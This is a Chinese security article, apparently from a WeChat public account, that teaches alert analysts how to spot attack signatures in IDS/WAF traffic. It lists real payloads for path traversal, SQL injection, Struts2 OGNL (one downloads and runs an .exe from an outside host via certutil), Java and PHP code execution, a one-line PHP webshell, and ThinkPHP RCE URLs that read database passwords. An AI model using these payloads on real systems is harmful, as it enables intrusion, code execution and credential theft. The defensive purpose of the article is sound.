威胁事件告警分析技巧及处置(一)
声明:公众号大部分文章来自团队核心成员和知识星球成员,少部分文章经过原作者授权和其它公众号白名单转载。未经授权,严禁转载,如需转载,请联系公众号管理员授权转载白名单!
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者及本公众号无关!
START
0x01前言
由于近几年信息安全人员紧缺,面临HW急需安全人员的竞赛中,许多安全厂商降低招聘要求,招收大量安全工作经验较少的人员参与HW当中,由于缺乏相应的工作经验,面对攻击团队的频繁入侵,导致误判、错封攻击源IP地址,进而对公司业务造成严重影响。小编对此对攻击流特征进行了一个详细的总结,本文适用于可查看攻击数据流量的设备,如:waf、ids、ips、天眼、睿眼以及其他全流量分析系统等。
0x02期望效果
看完本文后,您能学到:
>常见告警攻击特征识别
> 低危告警攻击事件忽略
> 研判告警攻击是否误报
> 复杂告警攻击Pcap取证
> 验证告警攻击是否成功
0x03通用攻击关键特征
在设备上产生的告警,就目前而言,基本都有这几个必要字段:请求头、响应码、响应头、载荷、原始数据包。通过这些字段我们可以进行事件的研判,但是就我个人而言,不必执着于告警名称,如果这些字段中包含了一些通用的攻击特征,那么我可判断为是真实攻击,然后再进行下一步确定是否是自己人员进行安全测试,是否需要溯源等下一步的工作计划,通用特征包含但不限于以下这些:
/etc/passwd/etc/shadow/
c:\boot.ini/
C:/Windows/system.ini、/windows/win.ini
../../../../../ 若是只有一个且后面是图片类型 pdf类型那需结合其他事件进行综合判断
cmd.exe /c[/k]、系统命令
/bin/bash
wget http://xx.xx.xx.xx/xx.sh
CHR(68)||CHR(113)||CHR(90)||CHR(85)%
print(md5(31337))
执行命令的函数等。0x04SQL注入攻击特征
常见安全漏洞对应攻击特征——SQL注入包含但不限于以下这些:
> select * from xx union select null,null
> order by 10[5][2][3]
> ") or ("1"="1
>‘and 1=2-- -[#]、 1') AnD 1419=1419 AnD ('1419'='1420
> 1' AND ROW(4622,4623)>(SELECT COUNT(*),CONCAT('PGC2UcNo',(SELECT (CASE WHEN (4622=4622) THEN 1 ELSE 0 END)),'PGC2UcNo',FLOOR(RAND(0)*2))x FROM (SELECT 4624 UNION SELECT 4625 UNION SELECT 4626 UNION SELECT 4627)a GROUP BY x) AND 'PGC2UcNo'='PGC2UcNo
> =@`'` Union select userid from `%23@__admin` where 1 or id=@`’`
> 9997') AND 8553%3D8553 AND ('PVZl'%3D'PVZl,1'%3BSELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(113)||CHR(90)||CHR(85)%2C5) FROM DUAL
> sleep(5)、waitfor delay '0:0:5'
> and if (ascii(substr(database(),1,1))、and if (length(database()) (updatexml(1,md5(0x666F7274657374),1)))、extractvalue、NAME_CONST
0x05Strusts2远程代码执行攻击特征
常见安全漏洞对应攻击特征——struts2远程代码执行包含但不限于以下这些:
> #_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#res=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#res.print('RTbZWnwBUdlseupNYQjf'),#res.flush(),#res.close()
> /?redirect:${%23w%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23w.println('SgEyRprkLcMdtnsTJCve'),%23w.flush(),%23w.close()}
> class.classLoader.resources.dirContext.aliases=/eCJivkuR=conf/
> Content-Type: %{(#nike='multipart/form-data').
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(#_memberAccess?(#_memberAccess=#dm):
((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ognlUtil.getExcludedPackageNames().clear()).
(#ognlUtil.getExcludedClasses().clear()).
(#context.setMemberAccess(#dm)))).
(#cmd='cmd.exe /c certutil.exe -urlcache -split -f http://wiu.fxxxxxxk.me/download.exe %SystemRoot%/Temp/aodagutnzwrjrlm15341.exe & cmd.exe /c %SystemRoot%/Temp/aodagutnzwrjrlm15341.exe').
(#iswin=(@java.lang.System@getProperty('os.name').
toLowerCase().contains('win'))).
(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{
0x06java代码执行攻击特征
常见安全漏洞对应攻击特征——Java代码执行包含但不限于以下这些:
@ognl.OgnlContext
new java.lang.ProcessBuilder
println(
(java.lang.Runtime).getRuntime().exec(new java.lang.String、${new java.lang.Integer( import+java.util.*;import+java.io java.io.PrintWriter
org.apache.commons.collections.functors.InvokerTransformer
0x07PHP远程代码执行攻击特征
常见安全漏洞对应攻击特征——PHP代码执行包含但不限于以下这些:
<?php eval($_POST[xxx])?>
eval()
assert()
preg_replace()
create_function()
call_user_func()
array_map()
call_user_func_array()
phpinfo()
system
exec
popen
passthru
shell_exec
file_put_contents
0x08Thinkphp远程代码执行攻击特征
Think PHP远程代码执行漏洞包含但不限于以下这些:
index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=base64_decode&vars[1][]=MWVVdGJrc2pLZ3AyRmx1Zg==
"_method": "__construct", "filter[]": "system", "method": "get", "get[]": 'php -r "phpinfo();“’
/index.php?s=/index/\\think\\app/invokefunction
/index.php?s=/index/\\think\\request/cache
?s=index/\\think\Request/input/index.php
/?s=index/\\think\\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1
?s=index/\\think\module/action/param1/${@phpinfo()}/
index.php?s=index/think\config/get&name=database.passwordindex.php
?s=index/think\config/get&name=database.password c=exec&f=calc.exe&_method=filter
